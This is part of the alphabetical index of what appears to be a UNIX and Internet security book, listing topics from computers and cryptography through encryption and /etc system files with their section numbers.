Computer Incident Advisory Capability (CIAC) : F.3.4.43. U.S. Department of Energy sites, Energy Sciences Network (ESnet), and DOE contractors

computer networks : 1.4.3. Add-On Functionality Breeds Problems<br />

Computer <strong>Sec</strong>urity Institute (CSI) : F.1.3. Computer <strong>Sec</strong>urity Institute (CSI)<br />

computers<br />

assigning UUCP name : 15.5.2. Permissions Commands<br />

auxiliary ports : 12.3.1.4. Auxiliary ports on terminals<br />

backing up individual : 7.2.1. Individual Workstation<br />

contacting administrator of : 24.2.4.2. How to contact the system administrator of a computer you don't know

cutting cables to : 25.1. Destructive Attacks<br />

failure of : 7.1.1.1. A taxonomy of computer failures<br />

hostnames for<br />

16.2.3. Hostnames<br />

16.2.3.1. The /etc/hosts file<br />

modems : (see modems)<br />

multiple screens : 12.3.4.3. Multiple screens<br />

multiple suppliers of : 18.6. Dependence on Third Parties<br />

non-citizen access to : 26.4.1. Munitions Export<br />

operating after breakin : 24.6. Resuming Operation<br />

portable : 12.2.6.3. Portables<br />

remote command execution : 17.3.17. rexec (TCP Port 512)<br />

running NIS+ : 19.5.5. NIS+ Limitations<br />

screen savers : 12.3.5.2. X screen savers<br />

security<br />

culture of : D.1.10. Understanding the Computer <strong>Sec</strong>urity "Culture"<br />

four steps toward : 2.4.4.7. Defend in depth<br />

physical : 12.2.6.1. Physically secure your computer<br />

references for : D.1.7. General Computer <strong>Sec</strong>urity<br />

resources on : D.1.1. Other Computer References<br />

seized as evidence : 26.2.4. Hazards of Criminal Prosecution<br />

transferring files between : 15.1.1. uucp Command<br />

trusting<br />

27.1. Can you Trust Your Computer?<br />

27.1.3. What the Superuser Can and Cannot Do<br />

unattended<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

unplugging : 24.2.5. Getting Rid of the Intruder<br />

vacuums for : 12.2.1.3. Dust<br />

vandalism of : (see vandalism)<br />

virtual : (see Telnet utility)<br />

computing base (TCB) : 8.5.3.2. Trusted computing base<br />

conf directory : 18.2.2.1. Configuration files<br />

conf/access.conf : (see access.conf file)<br />

conf/srm.conf file : 18.3.1. The access.conf and .htaccess Files<br />

confidentiality : (see encryption; privacy)<br />

configuration<br />

errors : 9.1. Prevention<br />

files : 11.5.3. Abusing Automatic Mechanisms<br />

logging : 10.7.2.2. Informational material<br />

NCSA web server : 18.2.2.1. Configuration files

UUCP version differences : 15.2. Versions of UUCP<br />

simplifying management of : 9.1.2. Read-only Filesystems<br />

connections<br />

hijacking : 16.3. IP <strong>Sec</strong>urity<br />

laundering : 16.1.1.1. Who is on the <strong>Internet</strong>?<br />

tracing<br />

24.2.4. Tracing a Connection<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

unplugging : 24.2.5. Getting Rid of the Intruder<br />

connectors, network : 12.2.4.3. Network connectors<br />

consistency of software : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

console device : 5.6. Device Files<br />

CONSOLE variable : 8.5.1. <strong>Sec</strong>ure Terminals<br />

constraining passwords : 8.8.2. Constraining Passwords<br />

consultants : 27.3.4. Your Consultants?<br />

context-dependent files (CDFs)<br />

5.9.2. Context-Dependent Files<br />

24.4.1.7. Hidden files and directories<br />

control characters in usernames : 3.1. Usernames<br />

cookies<br />

17.3.21.4. Using Xauthority magic cookies<br />

18.2.3.1. Do not trust the user's browser!<br />

COPS (Computer Oracle and Password System)<br />

19.5.5. NIS+ Limitations<br />

E.4.3. COPS (Computer Oracle and Password System)<br />

copyright<br />

9.2.1. Comparison Copies<br />

26.4.2. Copyright Infringement<br />

26.4.2.1. Software piracy and the SPA<br />

notices of : 26.2.6. Other Tips<br />

CORBA (Common Object Request Broker Architecture) : 19.2. Sun's Remote Procedure Call (RPC)<br />

core files<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

C.4. The kill Command<br />

cost-benefit analysis<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

costs of losses : 2.3.1. The Cost of Loss<br />

cp command : 7.4.1. Simple Local Copies<br />

cpio program<br />

7.3.2. Building an Automatic Backup System<br />

7.4.2. Simple Archives<br />

crack program<br />

8.8.3. Cracking Your Own Passwords<br />

18.3.3. Setting Up Web Users and Passwords<br />

cracking<br />

backing up because of : 7.1.1.1. A taxonomy of computer failures<br />

passwords<br />

3.6.1. Bad Passwords: Open Doors<br />

3.6.4. Passwords on Multiple Machines<br />

8.6.1. The crypt() Algorithm<br />

8.8.3. Cracking Your Own Passwords<br />

8.8.3.2. The dilemma of password crackers<br />

17.3.3. TELNET (TCP Port 23)<br />

logging failed attempts : 10.5.3. syslog Messages<br />

responding to<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

using rexecd : 17.3.17. rexec (TCP Port 512)<br />

crashes, logging : 10.7.2.1. Exception and activity reports<br />

CRC checksums : (see checksums)<br />

Cred table (NIS+) : 19.5.3. NIS+ Tables<br />

criminal prosecution<br />

26.2. Criminal Prosecution<br />

26.2.7. A Final Note on Criminal Actions<br />

cron file<br />

9.2.2.1. Simple listing<br />

11.5.1.4. Filename attacks<br />

11.5.3.1. crontab entries<br />

automating backups : 7.3.2. Building an Automatic Backup System<br />

cleaning up /tmp directory : 25.2.4. /tmp Problems<br />

collecting login times : 10.1.1. lastlog File<br />

symbolic links in : 10.3.7. Other Logs<br />

system clock and : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

uucp scripts in : 15.6.2. Automatic Execution of Cleanup Scripts<br />

crontab file : 15.6.2. Automatic Execution of Cleanup Scripts<br />

Crypt Breaker's Workbench (CBW) : 6.6.1.1. The crypt program<br />

crypt command/algorithm<br />

6.4.1. Summary of Private Key Systems<br />

6.6.1. <strong>UNIX</strong> crypt: The Original <strong>UNIX</strong> Encryption Command<br />

6.6.1.3. Example<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

18.3.3. Setting Up Web Users and Passwords<br />

crypt function<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

8.6.1. The crypt() Algorithm<br />

8.8.7. Algorithm and Library Changes<br />

23.5. Tips on Using Passwords<br />

crypt16 algorithm : 8.6.4. Crypt16() and Other Algorithms<br />

cryptography<br />

6. Cryptography<br />

6.7.2. Cryptography and Export Controls<br />

14.4.4.2. Protection against eavesdropping<br />

checklist for : A.1.1.5. Chapter 6: Cryptography<br />

checksums : 6.5.5.1. Checksums<br />

digital signatures : (see digital signatures)<br />

export laws concerning : 6.7.2. Cryptography and Export Controls<br />

Message Authentication Codes (MACs) : 6.5.5.2. Message authentication codes<br />

message digests : (see message digests)<br />

PGP : (see PGP)<br />

private-key<br />

6.4. Common Cryptographic Algorithms<br />

6.4.1. Summary of Private Key Systems<br />

public-key<br />

6.4. Common Cryptographic Algorithms<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

6.5.3. Digital Signatures<br />

18.3. Controlling Access to Files on Your Server<br />

18.6. Dependence on Third Parties<br />

references on : D.1.5. Cryptography Books<br />

and U.S. patents : 6.7.1. Cryptography and the U.S. Patent System<br />

csh (C shell)<br />

5.5.2. Problems with SUID<br />

11.5.1. Shell Features<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

C.5.3. Running the User's Shell<br />

(see also shells)<br />

autologout variable : 12.3.5.1. Built-in shell autologout<br />

history file : 10.4.1. Shell History<br />

uucp command : 15.1.1.1. uucp with the C shell<br />

.cshrc file<br />

11.5.2.2. .cshrc, .kshrc<br />

12.3.5.1. Built-in shell autologout<br />

24.4.1.6. Changes to startup files<br />

CSI (Computer <strong>Sec</strong>urity Institute) : F.1.3. Computer <strong>Sec</strong>urity Institute (CSI)<br />

CSLIP (Compressed SLIP) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

ctime<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

5.2.1. chmod: Changing a File's Permissions<br />

7.4.7. inode Modification Times<br />

9.2.3. Checksums and Signatures<br />

cu command<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.1. Originate testing<br />

14.5.3.3. Privilege testing<br />

-l option : 14.5.3.1. Originate testing<br />

culture, computer security : D.1.10. Understanding the Computer <strong>Sec</strong>urity "Culture"<br />

current directory : 5.1.3. Current Directory and Paths<br />

Customer Warning System (CWS) : F.3.4.34. Sun Microsystems customers<br />

Index: D

DAC (Discretionary Access Controls) : 4.1.3. Groups and Group Identifiers (GIDs)<br />

daemon (user) : 4.1. Users and Groups<br />

damage, liability for : 26.4.6. Liability for Damage<br />

DARPA : (see ARPA)<br />

DAT (Digital Audio Tape) : 7.1.4. Guarding Against Media Failure<br />

data<br />

assigning owners to : 2.4.4.1. Assign an owner<br />

availability of : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

communication equipment (DCE) : 14.3. The RS-232 Serial Protocol<br />

confidential<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

2.5.2. Confidential Information<br />

disclosure of : 11.2. Damage<br />

giving away with NIS : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

identifying assets : 2.2.1.1. Identifying assets<br />

integrity of : (see integrity, data)<br />

spoofing : 16.3. IP <strong>Sec</strong>urity<br />

terminal equipment (DTE) : 14.3. The RS-232 Serial Protocol<br />

Data Carrier Detect (DCD) : 14.3. The RS-232 Serial Protocol<br />

Data Defense Network (DDN) : F.3.4.20. MILNET<br />

Data Encryption Standard : (see DES)<br />

Data Set Ready (DSR) : 14.3. The RS-232 Serial Protocol<br />

Data Terminal Ready (DTR) : 14.3. The RS-232 Serial Protocol<br />

database files : 1.2. What Is an Operating System?<br />

databases : (see network databases)<br />

date command<br />

8.1.3. Accounts That Run a Single Command<br />

24.5.1. Never Trust Anything Except Hardcopy<br />

day-zero backups : 7.1.3. Types of Backups<br />

dbx debugger : C.4. The kill Command<br />

DCE (data communication equipment) : 14.3. The RS-232 Serial Protocol<br />

DCE (Distributed Computing Environment)<br />

3.2.2. The /etc/passwd File and Network Databases<br />

8.7.3. Code Books<br />

16.2.6.2. Other naming services<br />

19.2. Sun's Remote Procedure Call (RPC)<br />

19.7.1. DCE<br />

dd command<br />

6.6.1.2. Ways of improving the security of crypt<br />

7.4.1. Simple Local Copies<br />

DDN (Data Defense Network) : F.3.4.20. MILNET<br />

deadlock : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

debug command : 17.3.4.2. Using sendmail to receive email<br />

debugfs command : 25.2.2.8. Tree-structure attacks<br />

DEC (Digital Equipment Corporation) : F.3.4.9. Digital Equipment Corporation and customers<br />

DECnet protocol : 16.4.3. DECnet<br />

decode aliases : 17.3.4.2. Using sendmail to receive email<br />

decryption : (see encryption)<br />

defamation : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

default<br />

accounts : 8.1.2. Default Accounts<br />

deny : 21.1.1. Default Permit vs. Default Deny<br />

domain : 16.2.3. Hostnames<br />

permit : 21.1.1. Default Permit vs. Default Deny<br />

defense in depth : (see multilevel security)<br />

DELETE key : 3.4. Changing Your Password<br />

deleting<br />

destructive attack via : 25.1. Destructive Attacks<br />

files : 5.4. Using Directory Permissions<br />

demo accounts : 8.1.2. Default Accounts<br />

denial-of-service attacks<br />

1.5. Role of This Book<br />

25. Denial of Service Attacks and Solutions<br />

25.3.4. Clogging<br />

accidental : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

automatic lockout : 3.3. Entering Your Password<br />

checklist for : A.1.1.24. Chapter 25: Denial of Service Attacks and Solutions<br />

inodes : 25.2.2.3. Inode problems<br />

internal inetd services : 17.1.3. The /etc/inetd Program<br />

on networks<br />

25.3. Network Denial of Service Attacks<br />

25.3.4. Clogging<br />

via syslog : 10.5.1. The syslog.conf Configuration File<br />

X Window System : 17.3.21.5. Denial of service attacks under X<br />

departure of employees : 13.2.6. Departure<br />

depository directories, FTP : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

DES (Data Encryption Standard)<br />

6.4.1. Summary of Private Key Systems<br />

6.4.4. DES<br />

6.4.5.2. Triple DES<br />

8.6.1. The crypt() Algorithm<br />

authentication (NIS+) : 19.5.4. Using NIS+<br />

improving security of<br />

6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

des program<br />

6.4.4. DES<br />

6.4.5.2. Triple DES<br />

6.6.2. des: The Data Encryption Standard<br />

7.4.4. Encrypting Your Backups<br />

destroying media : 12.3.2.3. Sanitize your media before disposal<br />

destructive attacks : 25.1. Destructive Attacks<br />

detached signatures : 6.6.3.6. PGP detached signatures<br />

detectors<br />

cable tampering : 12.3.1.1. Wiretapping<br />

carbon-monoxide : 12.2.1.2. Smoke<br />

humidity : 12.2.1.11. Humidity<br />

logging alarm systems : 10.7.1.1. Exception and activity reports<br />

smoke : 12.2.1.2. Smoke<br />

temperature alarms : 12.2.1.6. Temperature extremes<br />

water sensors : 12.2.1.12. Water<br />

Deutsches Forschungsnetz : F.3.4.14. Germany: DFN-WiNet <strong>Internet</strong> sites<br />

/dev directory : 14.5.1. Hooking Up a Modem to Your Computer<br />

/dev/audio device : 23.8. Picking a Random Seed<br />

/dev/console device : 5.6. Device Files<br />

/dev/kmem device<br />

5.6. Device Files<br />

11.1.2. Back Doors and Trap Doors<br />

/dev/null device : 5.6. Device Files<br />

/dev/random device : 23.7.4. Other random number generators<br />

/dev/swap device : 5.5.1. SUID, SGID, and Sticky Bits<br />

/dev/urandom device : 23.7.4. Other random number generators<br />

device files : 5.6. Device Files<br />

devices<br />

managing with SNMP : 17.3.15. Simple Network Management Protocol (SNMP) (UDP Ports 161 and 162)

modem control : 14.5.2. Setting Up the <strong>UNIX</strong> Device<br />

Devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

df -i command : 25.2.2.3. Inode problems<br />

dictionary attack : 8.6.1. The crypt() Algorithm<br />

Diffie-Hellman key exchange system<br />

6.4.2. Summary of Public Key Systems<br />

18.6. Dependence on Third Parties<br />

19.3. <strong>Sec</strong>ure RPC (AUTH_DES)<br />

breaking key : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

exponential key exchange : 19.3.1. <strong>Sec</strong>ure RPC Authentication<br />

Digital Audio Tape (DAT) : 7.1.4. Guarding Against Media Failure<br />

digital computers : 6.1.2. Cryptography and Digital Computers<br />

Digital Equipment Corporation (DEC) : F.3.4.9. Digital Equipment Corporation and customers<br />

Digital Signature Algorithm : (see DSA)<br />

digital signatures<br />

6.4. Common Cryptographic Algorithms<br />

6.5. Message Digests and Digital Signatures<br />

6.5.5.2. Message authentication codes<br />

9.2.3. Checksums and Signatures<br />

checksums : 6.5.5.1. Checksums<br />

detached signatures : 6.6.3.6. PGP detached signatures<br />

with PGP : 6.6.3.4. Adding a digital signature to an announcement<br />

Digital <strong>UNIX</strong><br />

1.3. History of <strong>UNIX</strong><br />

(see also Ultrix)<br />

directories<br />

5.1.1. Directories<br />

5.1.3. Current Directory and Paths<br />

ancestor : 9.2.2.2. Ancestor directories<br />

backing up by : 7.1.3. Types of Backups<br />

CDFs (context-dependent files) : 24.4.1.7. Hidden files and directories<br />

checklist for : A.1.1.4. Chapter 5: The <strong>UNIX</strong> Filesystem<br />

dot, dot-dot, and / : 5.1.1. Directories<br />

FTP depositories : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

immutable : 9.1.1. Immutable and Append-Only Files<br />

listing automatically (Web) : 18.2.2.2. Additional configuration issues<br />

mounted : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

mounting secure : 19.3.2.5. Mounting a secure filesystem<br />

nested : 25.2.2.8. Tree-structure attacks<br />

NFS : (see NFS)<br />

permissions : 5.4. Using Directory Permissions<br />

read-only : 9.1.2. Read-only Filesystems<br />

restricted<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

root : (see root directory)<br />

SGID and sticky bits on : 5.5.6. SGID and Sticky Bits on Directories<br />

Web server structure of<br />

18.2.2. Understand Your Server's Directory Structure<br />

18.2.2.2. Additional configuration issues<br />

world-writable : 11.6.1.1. World-writable user files and directories<br />

<Directory> blocks<br />

18.3.1. The access.conf and .htaccess Files<br />

18.3.2. Commands Within the Block<br />

18.3.2.1. Examples<br />

disaster recovery : 12.2.6.4. Minimizing downtime<br />

disk attacks<br />

25.2.2. Disk Attacks<br />

25.2.2.8. Tree-structure attacks<br />

disk quotas : 25.2.2.5. Using quotas<br />

diskettes : (see backups; media)<br />

dismissed employees : 13.2.6. Departure<br />

disposing of materials : 12.3.3. Other Media<br />

Distributed Computing Environment : (see DCE)<br />

DNS (Domain Name System)<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

17.3.6.2. DNS nameserver attacks<br />

nameserver attacks : 17.3.6.2. DNS nameserver attacks<br />

rogue servers : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

security and : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

zone transfers<br />

17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

17.3.6.1. DNS zone transfers<br />

documentation<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

domain name : 16.2.3. Hostnames<br />

Domain Name System : (see DNS)<br />

domainname command : 19.4.3. NIS Domains<br />

domains : 19.4.3. NIS Domains<br />

dormant accounts<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

dot (.) directory : 5.1.1. Directories<br />

dot-dot (..) directory : 5.1.1. Directories<br />

Double DES : 6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

double reverse lookup : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

DOW USA : F.3.4.10. DOW USA<br />

downloading files : 12.3.4. Protecting Local Storage<br />

logging<br />

10.3.3. xferlog Log File<br />

10.3.5. access_log Log File<br />

downtime : 12.2.6.4. Minimizing downtime<br />

due to criminal investigations : 26.2.4. Hazards of Criminal Prosecution<br />

logging : 10.7.2.1. Exception and activity reports<br />

drand48 function : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

drills, security : 24.1.3. Rule #3: PLAN AHEAD<br />

drink : 12.2.2.1. Food and drink<br />

DSA (Digital Signature Algorithm)<br />

6.4.2. Summary of Public Key Systems<br />

6.5.3. Digital Signatures<br />

DTE (data terminal equipment) : 14.3. The RS-232 Serial Protocol<br />

du command : 25.2.2.1. Disk-full attacks<br />

dual universes : 5.9.1. Dual Universes<br />

ducts, air : 12.2.3.2. Entrance through air ducts<br />

dump/restore program<br />

7.1.3. Types of Backups<br />

7.4.3. Specialized Backup Programs<br />

7.4.4. Encrypting Your Backups<br />

dumpster diving : 12.3.3. Other Media<br />

duress code : 8.7.2. Token Cards<br />

dust : 12.2.1.3. Dust<br />

Index: E<br />

earthquakes : 12.2.1.4. Earthquake<br />

eavesdropping<br />

12.3.1. Eavesdropping<br />

12.3.1.5. Fiber optic cable<br />

12.4.1.2. Potential for eavesdropping and data theft<br />

14.4.4. Protecting Against Eavesdropping<br />

14.4.4.2. Protection against eavesdropping<br />

16.3.1. Link-level <strong>Sec</strong>urity<br />

IP packets<br />

16.3.1. Link-level <strong>Sec</strong>urity<br />

17.3.3. TELNET (TCP Port 23)<br />

through log files : 18.4.2. Eavesdropping Through Log Files<br />

on the Web<br />

18.4. Avoiding the Risks of Eavesdropping<br />

18.4.2. Eavesdropping Through Log Files<br />

X clients : 17.3.21.2. X security<br />

ECB (electronic code book)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

echo command : 23.5. Tips on Using Passwords<br />

ECPA (Electronic Communications Privacy Act) : 26.2.3. Federal Computer Crime Laws<br />

editing wtmp file : 10.1.3.1. Pruning the wtmp file<br />

editors : 11.5.2.7. Other initializations<br />

buffers for : 11.1.4. Trojan Horses<br />

Emacs : 11.5.2.3. GNU .emacs<br />

ex<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

startup file attacks : 11.5.2.4. .exrc<br />

vi<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

edquota command : 25.2.2.5. Using quotas<br />

EDS : F.3.4.11. EDS and EDS customers worldwide<br />

education : (see security, user awareness of)<br />

effective UIDs/GIDs<br />

4.3.1. Real and Effective UIDs<br />

5.5. SUID<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

C.1.3.2. Process real and effective UID<br />

8mm video tape : 7.1.4. Guarding Against Media Failure<br />

electrical fires<br />

12.2.1.2. Smoke<br />

(see also fires; smoke and smoking)<br />

electrical noise : 12.2.1.8. Electrical noise<br />

electronic<br />

breakins : (see breakins; cracking)<br />

code book (ECB)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

mail : (see mail)<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

ElGamal algorithm<br />

6.4.2. Summary of Public Key Systems<br />

6.5.3. Digital Signatures<br />

elm (mail system) : 11.5.2.5. .forward, .procmailrc<br />

emacs editor : 11.5.2.7. Other initializations<br />

.emacs file : 11.5.2.3. GNU .emacs<br />

email : (see mail)<br />

embedded commands : (see commands)<br />

embezzlers : 11.3. Authors<br />

emergency response organizations : (see response teams)<br />

employees<br />

11.3. Authors<br />

13. Personnel <strong>Sec</strong>urity<br />

13.3. Outsiders<br />

departure of : 13.2.6. Departure<br />

phonebook of : 12.3.3. Other Media<br />

security checklist for : A.1.1.12. Chapter 13: Personnel <strong>Sec</strong>urity<br />

targeted in legal investigation : 26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

trusting : 27.3.1. Your Employees?<br />

written authorization for : 26.2.6. Other Tips<br />

encryption<br />

6.2. What Is Encryption?<br />

6.2.2. The Elements of Encryption<br />

12.2.6.2. Encryption<br />

(see also cryptography)<br />

algorithms : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

crypt<br />

6.6.1. <strong>UNIX</strong> crypt: The Original <strong>UNIX</strong> Encryption Command<br />

6.6.1.3. Example<br />

Digital Signature Algorithm<br />

6.4.2. Summary of Public Key Systems<br />

6.5.3. Digital Signatures<br />

ElGamal : 6.4.2. Summary of Public Key Systems<br />

IDEA : 6.4.1. Summary of Private Key Systems<br />

RC2, RC4, and RC5<br />

6.4.1. Summary of Private Key Systems<br />

6.4.8. Proprietary Encryption Systems<br />

ROT13 : 6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

RSA<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

application-level : 16.3.1. Link-level <strong>Sec</strong>urity<br />

of backups<br />

7.1.6.3. Data security for backups<br />

7.4.4. Encrypting Your Backups<br />

12.3.2.4. Backup encryption<br />

checklist for : A.1.1.5. Chapter 6: Cryptography<br />

Data Encryption Standard (DES)<br />

6.4.1. Summary of Private Key Systems<br />

6.4.4. DES<br />

6.4.5.2. Triple DES<br />

6.6.2. des: The Data Encryption Standard<br />

DCE and : 3.2.2. The /etc/passwd File and Network Databases<br />

Diffie-Hellman : (see Diffie-Hellman key exchange system)<br />

end-to-end : 16.3.1. Link-level <strong>Sec</strong>urity<br />

Enigma system<br />

6.3. The Enigma Encryption System<br />

6.6.1.1. The crypt program<br />

(see also crypt command/algorithm)<br />

escrowing keys<br />

6.1.3. Modern Controversy<br />

7.1.6.3. Data security for backups<br />

exporting software : 26.4.1. Munitions Export<br />

of hypertext links : 18.4.1. Eavesdropping Over the Wire<br />

laws about<br />

6.7. Encryption and U.S. Law<br />

6.7.2. Cryptography and Export Controls<br />

link-level : 16.3.1. Link-level <strong>Sec</strong>urity<br />

of modems : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

Netscape Navigator system : 18.4.1. Eavesdropping Over the Wire<br />

with network services : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

one-time pad mechanism : 6.4.7. An Unbreakable Encryption Algorithm<br />

of passwords<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

8.6.4. Crypt16() and Other Algorithms<br />

23.5. Tips on Using Passwords<br />

PGP : (see PGP)<br />

programs for <strong>UNIX</strong><br />

6.6. Encryption Programs Available for <strong>UNIX</strong><br />

6.6.3.6. PGP detached signatures<br />

proprietary algorithms : 6.4.8. Proprietary Encryption Systems<br />

RC4 and RC5 algorithms : 6.4.1. Summary of Private Key Systems<br />

references on : D.1.5. Cryptography Books<br />

Skipjack algorithm : 6.4.1. Summary of Private Key Systems<br />

superencryption : 6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

and superusers : 6.2.4. Why Use Encryption with <strong>UNIX</strong>?<br />

of Web information : 18.4.1. Eavesdropping Over the Wire<br />

end-to-end encryption : 16.3.1. Link-level <strong>Sec</strong>urity<br />

Energy Sciences Network (ESnet) : F.3.4.43. U.S. Department of Energy sites, Energy Sciences Network (ESnet), and DOE contractors<br />

Enigma encryption system<br />

6.3. The Enigma Encryption System<br />

6.6.1.1. The crypt program<br />

Enterprise Networks : 16.1. Networking<br />

environment variables<br />

11.5.2.7. Other initializations<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

environment, physical<br />

12.2.1. The Environment<br />

12.2.1.13. Environmental monitoring<br />

erasing disks : 12.3.2.3. Sanitize your media before disposal<br />

erotica, laws governing : 26.4.5. Pornography and Indecent Material<br />

errno variable : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

errors : 7.1.1.1. A taxonomy of computer failures<br />

in ACLs : 5.2.5.1. AIX Access Control Lists<br />

configuration : 9.1. Prevention<br />

human : 7.1.4. Guarding Against Media Failure<br />

errors<br />

Preface<br />

(see also auditing, system activity)<br />

escape sequences, modems and : 14.5.3.1. Originate testing<br />

escrowing encryption keys<br />

6.1.3. Modern Controversy<br />

7.1.6.3. Data security for backups<br />

ESnet (Energy Sciences Network) : F.3.4.43. U.S. Department of Energy sites, Energy Sciences Network (ESnet), and DOE contractors<br />

espionage : 11.3. Authors<br />

/etc directory<br />

11.1.2. Back Doors and Trap Doors<br />

11.5.3.5. System initialization files<br />

backups of : 7.1.3. Types of Backups<br />

/etc/aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

/etc/default/login file : 8.5.1. <strong>Sec</strong>ure Terminals<br />

/etc/exports file<br />

11.6.1.2. Writable system files and directories<br />

19.3.2.4. Using <strong>Sec</strong>ure NFS<br />

making changes to : 20.2.1.2. /usr/etc/exportfs<br />

/etc/fbtab file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

/etc/fingerd program : (see finger command)<br />

/etc/fsck program : 24.4.1.7. Hidden files and directories<br />

/etc/fstab file<br />

11.1.2. Back Doors and Trap Doors<br />

19.3.2.5. Mounting a secure filesystem<br />

/etc/ftpd : (see ftpd server)<br />

/etc/ftpusers file : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

/etc/group file<br />

1.2. What Is an Operating System?<br />

4.1.3.1. The /etc/group file<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

8.1.6. Group Accounts<br />

/etc/halt command : 24.2.6. Anatomy of a Break-in<br />

/etc/hosts file : 16.2.3.1. The /etc/hosts file<br />

/etc/hosts.equiv : (see hosts.equiv file)<br />

/etc/hosts.lpd file : 17.3.18.6. /etc/hosts.lpd file<br />

/etc/inetd : (see inetd daemon)<br />

/etc/inetd.conf file : 17.3. Primary <strong>UNIX</strong> Network Services<br />

/etc/init program : C.5.1. Process #1: /etc/init<br />

/etc/inittab : (see inittab program)<br />

/etc/keystore file : 19.3.1.1. Proving your identity<br />

/etc/logindevperm file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

/etc/motd file : 26.2.6. Other Tips<br />

/etc/named.boot file<br />

17.3.6.1. DNS zone transfers<br />

17.3.6.2. DNS nameserver attacks<br />

/etc/passwd file<br />

1.2. What Is an Operating System?<br />

3.2.1. The /etc/passwd File<br />

3.2.2. The /etc/passwd File and Network Databases<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

8.1.1. Accounts Without Passwords<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

C.5.1. Process #1: /etc/init<br />

+ in : (see NIS)<br />

accounts without passwords : 8.1.1. Accounts Without Passwords<br />

backing up : 7.1.2. What Should You Back Up?<br />

new accounts : 24.4.1. New Accounts<br />

NFS : 20.2.1.1. /etc/exports<br />

uucp user and : 15.1.4. How the UUCP Commands Work<br />

/etc/profile file<br />

11.5.2.1. .login, .profile, /etc/profile<br />

24.4.1.6. Changes to startup files<br />

/etc/publickey file : 19.3.2.1. Creating passwords for users<br />

/etc/rc directory<br />

11.5.3.5. System initialization files<br />

17.1.2. Starting the Servers<br />

C.5.1. Process #1: /etc/init<br />

commenting out services : 17.3. Primary <strong>UNIX</strong> Network Services<br />

/etc/remote file<br />

10.3.1. aculog File<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

/etc/renice : (see renice command)<br />

/etc/secure/passwd file : 8.1.1. Accounts Without Passwords<br />

/etc/security/passwd.adjunct file : 8.8.5. Shadow Password Files<br />

/etc/sendmail/aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

/etc/services file : 17.1.1. The /etc/services File<br />

/etc/shadow file<br />

8.1.1. Accounts Without Passwords<br />

8.8.5. Shadow Password Files<br />

